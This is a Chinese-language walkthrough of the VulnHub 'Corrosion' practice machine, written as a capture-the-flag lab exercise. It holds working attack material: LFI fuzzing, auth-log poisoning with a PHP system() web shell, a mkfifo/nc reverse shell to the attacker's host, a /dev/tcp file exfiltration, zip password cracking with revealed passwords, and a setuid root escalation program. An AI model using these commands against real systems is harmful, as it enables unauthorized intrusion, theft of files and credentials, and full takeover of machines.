Download: https://download.vulnhub.com/corrosion/Corrosion.ova
Description
Difficulty: Easy
A easy box for beginners, but not too easy. Good Luck.
Hint: Enumerate Property.
作者是我喜欢的 UP: Proxy Programmer
一:信息收集
netdiscvoer 扫描IP
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 50:d2:f5:7c:60:ea 1 60 Beijing Xiaomi Mobile Software Co., Ltd
192.168.1.83 08:00:27:71:22:e6 1 60 PCS Systemtechnik GmbH
192.168.1.238 52:96:66:d8:a6:d9 1 60 Unknown vendor
端口扫描
全端口扫描
$ nmap -p- --min-rate 10000 192.168.1.83
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-26 04:51 EDT
Nmap scan report for 192.168.1.83
Host is up (0.0020s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 1.83 seconds
--script=default,版本扫描
$ nmap -p22,80 -sC -sV 192.168.1.83
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-26 04:55 EDT
Nmap scan report for 192.168.1.83
Host is up (0.00046s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.48 seconds
--script=vuln扫描
$ nmap -p22,80 --script=vuln 192.168.1.83
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-26 04:56 EDT
Nmap scan report for 192.168.1.83
Host is up (0.00085s latency).
PORT STATE SERVICE
22/tcp open ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Nmap done: 1 IP address (1 host up) scanned in 31.55 seconds
目录爆破
$ gobuster -u http://192.168.1.83/ -w /wordlist/directory-list-2.3-medium.txt -x php,txt,html
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.1.83/
[+] Threads : 10
[+] Wordlist : /wordlist/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : php,txt,html
[+] Timeout : 10s
=====================================================
2023/05/26 05:00:21 Starting gobuster
=====================================================
/index.html (Status: 200)
/tasks (Status: 301)
/blog-post (Status: 301)
/server-status (Status: 403)
=====================================================
2023/05/26 05:01:21 Finished
=====================================================
blog-post
$ gobuster dir -u "http://192.168.1.83/blog-post/" -w /wordlist/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.83/blog-post/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /wordlist/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: txt,html,php
[+] Timeout: 10s
===============================================================
2023/05/26 05:14:45 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/.php (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 190]
/archives (Status: 301) [Size: 325] [--> http://192.168.1.83/blog-post/archives/]
/uploads (Status: 301) [Size: 324] [--> http://192.168.1.83/blog-post/uploads/]
/.html (Status: 403) [Size: 277]
/.php (Status: 403) [Size: 277]
Progress: 877849 / 882244 (99.50%)
===============================================================
2023/05/26 05:15:25 Finished
===============================================================
二:GetShell
先看第一个目录tasks
$ curl http://192.168.1.83/tasks/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /tasks</title>
</head>
<body>
<h1>Index of /tasks</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="tasks_todo.txt">tasks_todo.txt</a></td><td align="right">2021-07-29 17:17 </td><td align="right">118 </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.46 (Ubuntu) Server at 192.168.1.83 Port 80</address>
</body></html>
$ curl http://192.168.1.83/tasks/tasks_todo.txt
# Tasks that need to be completed
1. Change permissions for auth log
2. Change port 22 -> 7672
3. Set up phpMyAdmin
ffuf
$ ffuf -u "http://192.168.1.83/blog-post/archives/randylogs.php?FUZZ=/etc/passwd" -w /wordlist/rockyou.txt --fw 1
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0
________________________________________________
:: Method : GET
:: URL : http://192.168.1.83/blog-post/archives/randylogs.php?FUZZ=/etc/passwd
:: Wordlist : FUZZ: /wordlist/rockyou.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
:: Filter : Response words: 1
________________________________________________
file [Status: 200, Size: 2832, Words: 38, Lines: 49]
:: Progress: [13336306/13336306] :: Job [1/1] :: 28557 req/sec :: Duration: [0:07:47] :: Errors: 518 ::
curl /etc/passwd
curl http://192.168.1.83/blog-post/archives/randylogs.php?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:118:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi:x:113:120:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:114:121:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:115:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
nm-openvpn:x:117:122:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
whoopsie:x:118:123::/nonexistent:/bin/false
sssd:x:119:124:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
saned:x:120:126::/var/lib/saned:/usr/sbin/nologin
colord:x:121:127:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
hplip:x:124:7:HPLIP system user,,,:/run/hplip:/bin/false
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
randy:x:1000:1000:randy,,,:/home/randy:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:127:65534::/run/sshd:/usr/sbin/nologin
然后采用这种战术,来注入php代码
$ ssh "<?php phpinfo(); ?>"@192.168.1.83
<?php phpinfo(); ?>@192.168.1.83's password:
Permission denied, please try again.
<?php phpinfo(); ?>@192.168.1.83's password:
curl -v "http://192.168.1.83/blog-post/archives/randylogs.php?file=/var/log/auth.log"
由于我开了 hydra 暴力破解 ssh,所以auth.log里面写了很多日志打开很慢,所以我新开了个靶机
新的靶机IP:192.168.1.23
注入
$ ssh "<?php system(\$_GET['cmd']); ?>"@192.168.1.23
<?php system($_GET['cmd']); ?>@192.168.1.23's password:
Permission denied, please try again.
<?php system($_GET['cmd']); ?>@192.168.1.23's password:
成功
$ curl "http://192.168.1.23/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=id"
May 26 13:18:35 corrosion gdm-launch-environment]: pam_unix(gdm-launch-environment:session): session opened for user gdm by (uid=0)
May 26 13:18:35 corrosion systemd-logind[629]: New session c1 of user gdm.
May 26 13:18:35 corrosion systemd: pam_unix(systemd-user:session): session opened for user gdm by (uid=0)
May 26 13:18:36 corrosion polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.42 [/usr/bin/gnome-shell], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_US.UTF-8)
May 26 13:19:00 corrosion dbus-daemon[593]: [system] Failed to activate service 'org.bluez': timed out (service_start_timeout=25000ms)
May 26 13:19:01 corrosion CRON[1348]: pam_unix(cron:session): session opened for user root by (uid=0)
May 26 13:19:01 corrosion CRON[1348]: pam_unix(cron:session): session closed for user root
May 26 05:19:32 corrosion systemd-logind[629]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
May 26 05:19:32 corrosion systemd-logind[629]: Watching system buttons on /dev/input/event0 (Power Button)
May 26 05:19:32 corrosion systemd-logind[629]: Watching system buttons on /dev/input/event1 (Sleep Button)
May 26 05:20:01 corrosion sshd[1967]: Invalid user from 192.168.1.171 port 56928
May 26 05:20:02 corrosion sshd[1967]: pam_unix(sshd:auth): check pass; user unknown
May 26 05:20:02 corrosion sshd[1967]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.171
May 26 05:20:03 corrosion CRON[1969]: pam_unix(cron:session): session opened for user root by (uid=0)
May 26 05:20:03 corrosion CRON[1969]: pam_unix(cron:session): session closed for user root
May 26 05:20:04 corrosion sshd[1967]: Failed password for invalid user from 192.168.1.171 port 56928 ssh2
May 26 05:20:08 corrosion sshd[1967]: pam_unix(sshd:auth): check pass; user unknown
May 26 05:20:09 corrosion sshd[1967]: Failed password for invalid user from 192.168.1.171 port 56928 ssh2
May 26 05:20:56 corrosion sshd[1967]: Connection closed by invalid user 192.168.1.171 port 56928 [preauth]
May 26 05:20:56 corrosion sshd[1967]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.171
May 26 05:21:01 corrosion CRON[2098]: pam_unix(cron:session): session opened for user root by (uid=0)
May 26 05:21:01 corrosion CRON[2098]: pam_unix(cron:session): session closed for user root
May 26 05:21:11 corrosion sshd[2393]: Invalid user uid=33(www-data) gid=33(www-data) groups=33(www-data)
from 192.168.1.171 port 51870
May 26 05:21:14 corrosion sshd[2393]: pam_unix(sshd:auth): check pass; user unknown
May 26 05:21:14 corrosion sshd[2393]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.171
May 26 05:21:15 corrosion sshd[2393]: Failed password for invalid user uid=33(www-data) gid=33(www-data) groups=33(www-data)
from 192.168.1.171 port 51870 ssh2
查看了有 nc,使用 which nc,然后使用 nc mkfifo
$ curl "http://192.168.1.23/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%20192.168.1.171%201234%20%3E%2Ftmp%2Ff"
成功反弹SHELl
$ nc -lvvp 1234
listening on [any] 1234 ...
192.168.1.23: inverse host lookup failed: Unknown host
connect to [192.168.1.171] from (UNKNOWN) [192.168.1.23] 41908
bash: cannot set terminal process group (836): Inappropriate ioctl for device
bash: no job control in this shell
www-data@corrosion:/var/www/html/blog-post/archives$
三:提权
找到了 user_backup.zip
$ ls -la
ls -la
total 2668
drwxr-xr-x 2 root root 4096 May 26 05:23 .
drwxr-xr-x 15 root root 4096 Jul 29 2021 ..
-rw-r--r-- 1 root root 61440 May 26 05:23 alternatives.tar.0
-rw-r--r-- 1 root root 2867 Jul 29 2021 alternatives.tar.1.gz
-rw-r--r-- 1 root root 102709 Jul 29 2021 apt.extended_states.0
-rw-r--r-- 1 root root 11 Jul 29 2021 dpkg.arch.0
-rw-r--r-- 1 root root 43 Jul 29 2021 dpkg.arch.1.gz
-rw-r--r-- 1 root root 43 Jul 29 2021 dpkg.arch.2.gz
-rw-r--r-- 1 root root 616 Jul 29 2021 dpkg.diversions.0
-rw-r--r-- 1 root root 220 Jul 29 2021 dpkg.diversions.1.gz
-rw-r--r-- 1 root root 220 Jul 29 2021 dpkg.diversions.2.gz
-rw-r--r-- 1 root root 272 Jul 29 2021 dpkg.statoverride.0
-rw-r--r-- 1 root root 194 Jul 29 2021 dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 168 Apr 20 2021 dpkg.statoverride.2.gz
-rw-r--r-- 1 root root 1721335 Jul 30 2021 dpkg.status.0
-rw-r--r-- 1 root root 395230 Jul 29 2021 dpkg.status.1.gz
-rw-r--r-- 1 root root 386883 Jul 29 2021 dpkg.status.2.gz
-rw-r--r-- 1 root root 3285 Jul 30 2021 user_backup.zip
尝试用 nc 传到 kali 来
kali
$ nc -lvnp 1233 > user_backup.zip
靶机
www-data@corrosion:/var/backups$ cat user_backup.zip > /dev/tcp/192.168.1.171/1233
然后发现 zip 有密码
$ fcrackzip -u -D -p /wordlist/dict.txt user.zip
PASSWORD FOUND!!!!: pw == !randybaby
$ unzip user.zip
Archive: user.zip
[user.zip] id_rsa password:
inflating: id_rsa
inflating: id_rsa.pub
extracting: my_password.txt
inflating: easysysinfo.c
$ ls
easysysinfo.c id_rsa id_rsa.pub my_password.txt user.zip
Ok
$ ssh randy@192.168.1.23 -i id_rsa
randy@192.168.1.23's password: randylovesgoldfish1998
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-25-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
119 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Fri Jul 30 15:28:02 2021 from 10.0.0.69
randy@corrosion:~$
提权root
randy@corrosion:~/tools$ sudo -l
Matching Defaults entries for randy on corrosion:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User randy may run the following commands on corrosion:
(root) PASSWD: /home/randy/tools/easysysinfo
randy@corrosion:~/tools$ rm * -rf
然后 编写一个 easysysinfo
randy@corrosion:~/tools$ cat exploit.c
#include <unistd.h>
void main()
{
setuid(0);
setgid(0);
system("/usr/bin/bash -i");
}
randy@corrosion:~/tools$ gcc exploit.c -o easysysinfo
exploit.c: In function ‘main’:
exploit.c:6:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
6 | system("/usr/bin/bash -i");
| ^~~~~~
randy@corrosion:~/tools$ chmod 755 easysysinfo
randy@corrosion:~/tools$ chmod +s easysysinfo
randy@corrosion:~/tools$ sudo /home/randy/tools/easysysinfo
root@corrosion:/home/randy/tools# id
uid=0(root) gid=0(root) groups=0(root)
root@corrosion:/home/randy/tools# cd /root
root@corrosion:~# cat root.txt
NULLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
Congrats! Hope you enjoyed my first machine posted on VulnHub!
Ping me on twitter @proxyprgrammer for any suggestions.
Youtube: https://www.youtube.com/c/ProxyProgrammer
Twitter: https://twitter.com/proxyprgrammer
root@corrosion:~#
